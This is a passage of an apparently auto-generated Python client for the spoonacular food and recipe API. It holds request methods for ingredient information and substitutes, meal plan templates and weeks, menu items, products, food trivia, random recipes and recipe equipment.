    :param float id: The ingredient id. (required)
    :param float amount: The amount of this ingredient.
    :param str unit: The unit for the given amount.
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_ingredient_information_with_http_info(id, **kwargs)  # noqa: E501
def get_ingredient_information_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Ingredient Information  # noqa: E501

    Use an ingredient id to get all available information about an
    ingredient, such as its image and supermarket aisle.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_ingredient_information_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The ingredient id. (required)
    :param float amount: The amount of this ingredient.
    :param str unit: The unit for the given amount.
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'id',
        'amount',
        'unit',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_ingredient_information" % key
            )
        local_var_params[key] = val

    # verify the required parameter 'id' is set
    if local_var_params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_ingredient_information`")  # noqa: E501

    collection_formats = {}

    path_params = {'id': local_var_params['id']}  # noqa: E501

    query_params = []
    if 'amount' in local_var_params:
        query_params.append(('amount', local_var_params['amount']))  # noqa: E501
    if 'unit' in local_var_params:
        query_params.append(('unit', local_var_params['unit']))  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/ingredients/{id}/information', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_ingredient_substitutes(self, ingredient_name, **kwargs):  # noqa: E501
    """Get Ingredient Substitutes  # noqa: E501

    Search for substitutes for a given ingredient.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_ingredient_substitutes(ingredient_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_name: The name of the ingredient you want to
        replace. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_ingredient_substitutes_with_http_info(ingredient_name, **kwargs)  # noqa: E501
def get_ingredient_substitutes_with_http_info(self, ingredient_name, **kwargs):  # noqa: E501
    """Get Ingredient Substitutes  # noqa: E501

    Search for substitutes for a given ingredient.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_ingredient_substitutes_with_http_info(ingredient_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ingredient_name: The name of the ingredient you want to
        replace. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'ingredient_name',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_ingredient_substitutes" % key
            )
        local_var_params[key] = val

    # verify the required parameter 'ingredient_name' is set
    if local_var_params.get('ingredient_name') is None:
        raise ApiValueError("Missing the required parameter `ingredient_name` when calling `get_ingredient_substitutes`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # API expects camelCase query key for the snake_case python argument.
    query_params = [('ingredientName', local_var_params['ingredient_name'])]  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/ingredients/substitutes', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_ingredient_substitutes_by_id(self, id, **kwargs):  # noqa: E501
    """Get Ingredient Substitutes by ID  # noqa: E501

    Search for substitutes for a given ingredient.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_ingredient_substitutes_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The id of the ingredient you want substitutes for. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_ingredient_substitutes_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_ingredient_substitutes_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Ingredient Substitutes by ID  # noqa: E501

    Search for substitutes for a given ingredient.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_ingredient_substitutes_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The id of the ingredient you want substitutes for. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'id',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_ingredient_substitutes_by_id" % key
            )
        local_var_params[key] = val

    # verify the required parameter 'id' is set
    if local_var_params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_ingredient_substitutes_by_id`")  # noqa: E501

    collection_formats = {}

    path_params = {'id': local_var_params['id']}  # noqa: E501
    query_params = []
    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/food/ingredients/{id}/substitutes', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_meal_plan_template(self, username, id, hash, **kwargs):  # noqa: E501
    """Get Meal Plan Template  # noqa: E501

    Get information about a meal plan template.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_meal_plan_template(username, id, hash, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param float id: The shopping list item id. (required)
    :param str hash: The private hash for the username. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_meal_plan_template_with_http_info(username, id, hash, **kwargs)  # noqa: E501
def get_meal_plan_template_with_http_info(self, username, id, hash, **kwargs):  # noqa: E501
    """Get Meal Plan Template  # noqa: E501

    Get information about a meal plan template.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_meal_plan_template_with_http_info(username, id, hash, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param float id: The shopping list item id. (required)
    :param str hash: The private hash for the username. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'username',
        'id',
        'hash',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_meal_plan_template" % key
            )
        local_var_params[key] = val

    # verify every required parameter is set (order matches the API spec)
    for required in ('username', 'id', 'hash'):
        if local_var_params.get(required) is None:
            raise ApiValueError(
                "Missing the required parameter `%s` when calling "
                "`get_meal_plan_template`" % required
            )

    collection_formats = {}

    path_params = {
        'username': local_var_params['username'],  # noqa: E501
        'id': local_var_params['id'],  # noqa: E501
    }

    query_params = [('hash', local_var_params['hash'])]  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/mealplanner/{username}/templates/{id}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_meal_plan_templates(self, username, hash, **kwargs):  # noqa: E501
    """Get Meal Plan Templates  # noqa: E501

    Get meal plan templates from user or public ones.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_meal_plan_templates(username, hash, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str hash: The private hash for the username. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_meal_plan_templates_with_http_info(username, hash, **kwargs)  # noqa: E501
def get_meal_plan_templates_with_http_info(self, username, hash, **kwargs):  # noqa: E501
    """Get Meal Plan Templates  # noqa: E501

    Get meal plan templates from user or public ones.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_meal_plan_templates_with_http_info(username, hash, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str hash: The private hash for the username. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'username',
        'hash',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_meal_plan_templates" % key
            )
        local_var_params[key] = val

    # verify every required parameter is set (order matches the API spec)
    for required in ('username', 'hash'):
        if local_var_params.get(required) is None:
            raise ApiValueError(
                "Missing the required parameter `%s` when calling "
                "`get_meal_plan_templates`" % required
            )

    collection_formats = {}

    path_params = {'username': local_var_params['username']}  # noqa: E501

    query_params = [('hash', local_var_params['hash'])]  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/mealplanner/{username}/templates', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_meal_plan_week(self, username, start_date, hash, **kwargs):  # noqa: E501
    """Get Meal Plan Week  # noqa: E501

    Retrieve a meal planned week for the given user. The username must be a
    spoonacular user and the hash must the the user's hash that can be found
    in his/her account.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_meal_plan_week(username, start_date, hash, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str start_date: The start date of the meal planned week in the
        format yyyy-mm-dd. (required)
    :param str hash: The private hash for the username. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Convenience wrapper: callers always get the deserialized payload,
    # never the raw (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # With async_req the delegate returns the request thread, otherwise
    # the response data -- both are passed straight through.
    return self.get_meal_plan_week_with_http_info(username, start_date, hash, **kwargs)  # noqa: E501
def get_meal_plan_week_with_http_info(self, username, start_date, hash, **kwargs):  # noqa: E501
    """Get Meal Plan Week  # noqa: E501

    Retrieve a meal planned week for the given user. The username must be a
    spoonacular user and the hash must the the user's hash that can be found
    in his/her account.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_meal_plan_week_with_http_info(username, start_date, hash, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str username: The username. (required)
    :param str start_date: The start date of the meal planned week in the
        format yyyy-mm-dd. (required)
    :param str hash: The private hash for the username. (required)
    :return: object
        If the method is called asynchronously, returns the request thread.
    """
    # Capture locals() first so it holds exactly the named parameters
    # plus the 'kwargs' dict and nothing else.
    local_var_params = locals()

    all_params = [
        'username',
        'start_date',
        'hash',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]

    # Fold recognised keyword arguments into the parameter map; reject
    # anything this endpoint does not understand.
    extra_kwargs = local_var_params.pop('kwargs')
    for key, val in six.iteritems(extra_kwargs):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_meal_plan_week" % key
            )
        local_var_params[key] = val

    # verify every required parameter is set (order matches the API spec)
    for required in ('username', 'start_date', 'hash'):
        if local_var_params.get(required) is None:
            raise ApiValueError(
                "Missing the required parameter `%s` when calling "
                "`get_meal_plan_week`" % required
            )

    collection_formats = {}

    # URL template uses a hyphenated placeholder for the snake_case argument.
    path_params = {
        'username': local_var_params['username'],  # noqa: E501
        'start-date': local_var_params['start_date'],  # noqa: E501
    }

    query_params = [('hash', local_var_params['hash'])]  # noqa: E501

    form_params = []
    local_var_files = {}
    body_params = None

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }

    # Authentication setting
    auth_settings = ['apiKeyScheme']  # noqa: E501

    return self.api_client.call_api(
        '/mealplanner/{username}/week/{start-date}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='object',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_menu_item_information(self, id, **kwargs):  # noqa: E501
    """Get Menu Item Information  # noqa: E501

    Use a menu item id to get all available information about a menu item, such as nutrition.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_menu_item_information(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The menu item id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_menu_item_information_with_http_info(id, **kwargs)  # noqa: E501
def get_menu_item_information_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Menu Item Information  # noqa: E501

    Use a menu item id to get all available information about a menu item, such as nutrition.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_menu_item_information_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The menu item id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameter plus the common per-request options.
    accepted = ['id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'id': id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_menu_item_information" % name
            )
        params[name] = value
    # 'id' is required by the API.
    if params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_menu_item_information`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/food/menuItems/{id}', 'GET',
        {'id': params['id']},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_product_information(self, id, **kwargs):  # noqa: E501
    """Get Product Information  # noqa: E501

    Use a product id to get full information about a product, such as ingredients, nutrition, etc. The nutritional information is per serving.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_product_information(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The id of the packaged food. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_product_information_with_http_info(id, **kwargs)  # noqa: E501
def get_product_information_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Product Information  # noqa: E501

    Use a product id to get full information about a product, such as ingredients, nutrition, etc. The nutritional information is per serving.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_product_information_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The id of the packaged food. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameter plus the common per-request options.
    accepted = ['id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'id': id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_product_information" % name
            )
        params[name] = value
    # 'id' is required by the API.
    if params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_product_information`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/food/products/{id}', 'GET',
        {'id': params['id']},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_random_food_trivia(self, **kwargs):  # noqa: E501
    """Get Random Food Trivia  # noqa: E501

    Returns random food trivia.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_random_food_trivia(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_random_food_trivia_with_http_info(**kwargs)  # noqa: E501
def get_random_food_trivia_with_http_info(self, **kwargs):  # noqa: E501
    """Get Random Food Trivia  # noqa: E501

    Returns random food trivia.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_random_food_trivia_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # This endpoint takes no endpoint-specific parameters; only the
    # common per-request options are accepted.
    accepted = ['async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    opts = {}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_random_food_trivia" % name
            )
        opts[name] = value

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/food/trivia/random', 'GET',
        {},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=opts.get('async_req'),
        _return_http_data_only=opts.get('_return_http_data_only'),  # noqa: E501
        _preload_content=opts.get('_preload_content', True),
        _request_timeout=opts.get('_request_timeout'),
        collection_formats={})
def get_random_recipes(self, **kwargs):  # noqa: E501
    """Get Random Recipes  # noqa: E501

    Find random (popular) recipes. If you need to filter recipes by diet, nutrition etc. you might want to consider using the complex recipe search endpoint and set the sort request parameter to random.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_random_recipes(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
    :param str tags: The tags (can be diets, meal types, cuisines, or intolerances) that the recipe must have.
    :param float number: The number of random recipes to be returned (between 1 and 100).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_random_recipes_with_http_info(**kwargs)  # noqa: E501
def get_random_recipes_with_http_info(self, **kwargs):  # noqa: E501
    """Get Random Recipes  # noqa: E501

    Find random (popular) recipes. If you need to filter recipes by diet, nutrition etc. you might want to consider using the complex recipe search endpoint and set the sort request parameter to random.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_random_recipes_with_http_info(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
    :param str tags: The tags (can be diets, meal types, cuisines, or intolerances) that the recipe must have.
    :param float number: The number of random recipes to be returned (between 1 and 100).
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    accepted = ['limit_license', 'tags', 'number',
                'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    opts = {}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_random_recipes" % name
            )
        opts[name] = value

    # Map python_case parameter names to their query-string spellings,
    # including only those the caller actually provided.
    query_params = []
    for py_name, api_name in (('limit_license', 'limitLicense'),
                              ('tags', 'tags'),
                              ('number', 'number')):
        if py_name in opts:
            query_params.append((api_name, opts[py_name]))  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/recipes/random', 'GET',
        {},
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=opts.get('async_req'),
        _return_http_data_only=opts.get('_return_http_data_only'),  # noqa: E501
        _preload_content=opts.get('_preload_content', True),
        _request_timeout=opts.get('_request_timeout'),
        collection_formats={})
def get_recipe_equipment_by_id(self, id, **kwargs):  # noqa: E501
    """Get Recipe Equipment by ID  # noqa: E501

    Get a recipe's equipment list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_equipment_by_id(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
    return self.get_recipe_equipment_by_id_with_http_info(id, **kwargs)  # noqa: E501
def get_recipe_equipment_by_id_with_http_info(self, id, **kwargs):  # noqa: E501
    """Get Recipe Equipment by ID  # noqa: E501

    Get a recipe's equipment list.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_equipment_by_id_with_http_info(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The recipe id. (required)
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Endpoint parameter plus the common per-request options.
    accepted = ['id', 'async_req', '_return_http_data_only',
                '_preload_content', '_request_timeout']
    params = {'id': id}
    for name, value in six.iteritems(kwargs):
        if name not in accepted:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s' to method get_recipe_equipment_by_id" % name
            )
        params[name] = value
    # 'id' is required by the API.
    if params.get('id') is None:
        raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_equipment_by_id`")  # noqa: E501

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
    }
    return self.api_client.call_api(
        '/recipes/{id}/equipmentWidget.json', 'GET',
        {'id': params['id']},
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='object',  # noqa: E501
        auth_settings=['apiKeyScheme'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def get_recipe_information(self, id, **kwargs):  # noqa: E501
    """Get Recipe Information  # noqa: E501

    Use a recipe id to get full information about a recipe, such as ingredients, nutrition, diet and allergen information, etc.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_recipe_information(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param float id: The id of the recipe. (required)
    :param bool include_nutrition: Include nutrition data in the recipe information. Nutrition data is per serving. If you want the nutrition data for the entire recipe, just multiply by the number of servings.
    :return: object
             If the method is called asynchronously,
             returns the request thread.
    """
    # Default to returning only the deserialized data, but honor an
    # explicit caller choice: the previous code forced True, so a caller
    # passing _return_http_data_only=False was silently ignored.
    kwargs['_return_http_data_only'] = kwargs.get('_return_http_data_only', True)
    # Both the async and sync paths delegate to the same call; the
    # request thread (async) or the data (sync) is returned directly.
